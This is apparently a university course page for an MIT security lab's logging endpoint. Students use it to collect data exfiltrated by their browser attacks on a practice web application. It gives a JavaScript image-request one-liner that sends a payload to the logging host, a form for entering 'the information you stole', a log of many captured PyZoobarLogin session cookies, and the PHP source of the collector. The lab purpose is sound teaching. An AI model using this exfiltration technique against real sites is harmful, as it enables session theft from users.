Lab 4 Logging Script

You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:

(new Image()).src='https://css.csail.mit.edu/6.566/2024/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();

The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.

Test form

If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)


(some identifier to locate your payload in the log)


(the information you stole)

Logged entries

Below are the most recent logged entries, so that you can check if your attack worked:

Sat, 14 Jun 2025 09:03:52 +0000: Pale: Pale/123
Fri, 13 Jun 2025 19:19:46 +0000: Pale: Pale/123
Fri, 13 Jun 2025 19:13:45 +0000: Pale: Pale/123
Fri, 13 Jun 2025 19:08:48 +0000: Pale: Pale / 123
Fri, 13 Jun 2025 19:06:46 +0000: Pale: Pale + '/' + 123
Fri, 13 Jun 2025 18:59:56 +0000: Pale: Pale/123
Fri, 13 Jun 2025 18:58:42 +0000: Pale: Pale/123
Fri, 13 Jun 2025 18:54:08 +0000: Pale: Pale/123
Fri, 13 Jun 2025 18:45:39 +0000: Pale: Pale/123
Fri, 13 Jun 2025 18:37:41 +0000: Pale: PyZoobarLogin=Pale#23a2aac5c2d958381f66ee04173c2b64c82ad16a54a06c11ad1814b308da0fe5
Fri, 13 Jun 2025 18:31:09 +0000: Pale: Pale/123
Fri, 13 Jun 2025 18:27:46 +0000: Pale: Pale/123
Fri, 13 Jun 2025 17:54:44 +0000: Pale: Pale/123
Fri, 13 Jun 2025 17:48:03 +0000: Pale: Pale/123
Fri, 13 Jun 2025 17:41:43 +0000: Pale: Pale/123
Fri, 13 Jun 2025 17:25:47 +0000: Pale: PyZoobarLogin=Pale#b012a50039e7f0168c773381f6923c57c5eaa24ff28394d0048c09ef7846779b
Fri, 13 Jun 2025 14:01:38 +0000: Pale: PyZoobarLogin=Pale#37efe8e782c54210ee5b47d51e1ec3cce918fa751ca016c0a9ef2dea2b3ca0f1
Fri, 13 Jun 2025 11:45:02 +0000: Pale: PyZoobarLogin=Pale#b61db581f1338e08eef149928fa87be9ed084beb78371e8ee5c1142136c93cab
Fri, 13 Jun 2025 11:43:30 +0000: Pale: PyZoobarLogin=Pale#b61db581f1338e08eef149928fa87be9ed084beb78371e8ee5c1142136c93cab
Fri, 13 Jun 2025 11:43:15 +0000: Pale: PyZoobarLogin=Pale#b61db581f1338e08eef149928fa87be9ed084beb78371e8ee5c1142136c93cab
Fri, 13 Jun 2025 11:43:08 +0000: Pale: PyZoobarLogin=Pale#b61db581f1338e08eef149928fa87be9ed084beb78371e8ee5c1142136c93cab
Fri, 13 Jun 2025 11:41:39 +0000: YOUR_USERNAME: PyZoobarLogin=Pale#b61db581f1338e08eef149928fa87be9ed084beb78371e8ee5c1142136c93cab
Fri, 13 Jun 2025 11:26:23 +0000: YOUR_USERNAME: PyZoobarLogin=Pale#b61db581f1338e08eef149928fa87be9ed084beb78371e8ee5c1142136c93cab
Fri, 13 Jun 2025 11:24:30 +0000: YOUR_USERNAME: PyZoobarLogin=Pale#b61db581f1338e08eef149928fa87be9ed084beb78371e8ee5c1142136c93cab
Fri, 13 Jun 2025 08:57:15 +0000: Pale: PyZoobarLogin=Pale#b61db581f1338e08eef149928fa87be9ed084beb78371e8ee5c1142136c93cab
Fri, 13 Jun 2025 08:55:36 +0000: Pale: PyZoobarLogin=Pale#b61db581f1338e08eef149928fa87be9ed084beb78371e8ee5c1142136c93cab
Thu, 12 Jun 2025 18:26:52 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 15:59:20 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 14:38:58 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 14:34:13 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 14:28:03 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 14:25:07 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 14:24:48 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 14:00:43 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 14:00:29 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 14:00:11 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 13:58:57 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 13:57:48 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 13:57:27 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 13:47:13 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 13:37:26 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 13:36:23 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 13:31:22 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 13:28:09 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 13:27:05 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 13:26:57 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 13:25:46 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 13:23:38 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 13:16:40 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 13:03:45 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 13:01:49 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 12:49:18 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 12:40:23 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 12:39:35 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 12:30:17 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 12:29:04 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 12:12:34 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 11:53:53 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 11:06:35 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 10:56:13 +0000: YOUR_USERNAME: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 10:05:26 +0000: YOUR_USERNAME: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 09:46:23 +0000: Pale: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Thu, 12 Jun 2025 09:45:53 +0000: YOUR_USERNAME: PyZoobarLogin=Pale#cc717253c91cc3439025d8e54dca486e71dfc782959f219d998f4c6f16cc9766
Tue, 10 Jun 2025 16:25:19 +0000: Pale: PyZoobarLogin=Pale#3cff17cec8dea2468c5ae4eccf36b3dd07679ab7fdbb965d17d4c5c50113a262
Tue, 10 Jun 2025 16:22:32 +0000: Pale: PyZoobarLogin=Pale#3cff17cec8dea2468c5ae4eccf36b3dd07679ab7fdbb965d17d4c5c50113a262
Tue, 10 Jun 2025 16:22:11 +0000: Pale: PyZoobarLogin=Pale#3cff17cec8dea2468c5ae4eccf36b3dd07679ab7fdbb965d17d4c5c50113a262
Thu, 05 Jun 2025 18:19:40 +0000: Pale: PyZoobarLogin=Pale#8308de8636412d560e61fd43962900887078a1115d02ab437b7cc3b6bc321177
Thu, 05 Jun 2025 18:18:23 +0000: Pale: 1
Thu, 05 Jun 2025 18:12:23 +0000: ${athenaId}: ${encodedPayload}
Thu, 05 Jun 2025 18:11:42 +0000: Pale: 1
Thu, 05 Jun 2025 18:09:58 +0000: ${athenaId}: ${encodedPayload}
Thu, 05 Jun 2025 18:07:53 +0000: my-username: some-string
Thu, 05 Jun 2025 18:02:33 +0000: 手机号大啊啊啊啊啊啊啊啊啊啊啊快速导航hsd: 是打算灌灌灌灌灌灌灌灌灌灌灌灌灌灌灌灌
Thu, 05 Jun 2025 17:59:35 +0000: Pale: PyZoobarLogin%3DPale%238308de8636412d560e61fd43962900887078a1115d02ab437b7cc3b6bc321177
Thu, 05 Jun 2025 17:58:32 +0000: Pale: PyZoobarLogin=Pale#8308de8636412d560e61fd43962900887078a1115d02ab437b7cc3b6bc321177
Thu, 05 Jun 2025 17:29:42 +0000: my-username: some-string
Thu, 05 Jun 2025 17:26:16 +0000: pale: sddfsdfsdgsdg
Thu, 05 Jun 2025 17:25:56 +0000: pale: sd

Source code

In case you are curious, here is the source code of this page.

<?php
header("Access-Control-Allow-Origin: *");

do {
    if (!array_key_exists("id", $_REQUEST)) {
        break;
    }

    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }

    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }

    $payload = $_REQUEST['payload'];
    if (empty($payload)) {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }

    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }

    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }

    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }

    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);

    $file = fopen("/tmp/6.566-2024-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }

    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }

    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $lines[] = fgets($file);
    }
    ftruncate($file, 0);
    rewind($file);
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as &$line) {
        fwrite($file, $line);
    }

    flock($file, LOCK_UN);
    fclose($file);

    echo "Logged!";
    return;
} while(0);

$link = "(new Image()).src="
      . "'https://css.csail.mit.edu/6.566/2024/labs/log.php?'"
      . " + 'id=my-username'"
      . " + '&payload=some-string' + '&random='"
      . " + Math.random()";
?><!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" type="text/css" href="labs.css" />
        <title>Lab 4 Logging Script</title>
    </head>
    <body>
        <h1>Lab 4 Logging Script</h1>
        <p>
            You can use this server side script to extract data from
            client-side JavaScript. For example, clicking this client-side
            hyperlink will cause the server to log the payload:
        </p>
        <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
        <p>
            The random argument is ignored, but ensures that the browser
            bypasses its cache when downloading the image. We suggest that you
            use the random argument in your scripts as well.  The ID argument
            will help you distinguish your log entries from those sent by other
            students; we suggest picking your MIT Athena username.  Newlines are not
            allowed in <tt>javascript:</tt> links; if this bothers you, try
            <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
        </p>

        <h2>Test form</h2>
        <p>
            If you just want to try out the script, you can use this form.
            (For your actual attacks in lab 4, you'll probably want to use the
            JavaScript image technique shown above.)
        </p>

        <form method="GET" action="">
            <label for="id">ID:</label><br />
            <input name="id" placeholder="your-mit-username" size="40" />
            <i>(some identifier to locate your payload in the log)</i>
            <br />
            <br />
            <label for="payload">Payload:</label><br />
            <input name="payload" placeholder="some-string" size="40" />
            <i>(the information you stole)</i>
            <br />
            <input type="submit" value="Log" name="log_submit" />
    </form>

    <h2>Logged entries</h2>
    <p>
        Below are the most recent logged entries, so that you can check
            if your attack worked:
    </p>

    <pre class="tty"><?php
        $lines = file_get_contents("/tmp/6.566-2024-logger.txt");
        echo htmlspecialchars($lines);
    ?></pre>

        <h2>Source code</h2>
        <p>In case you are curious, here is the source code of this page.</p>
        <pre><?php highlight_file(__FILE__); ?></pre>
    </body>
</html>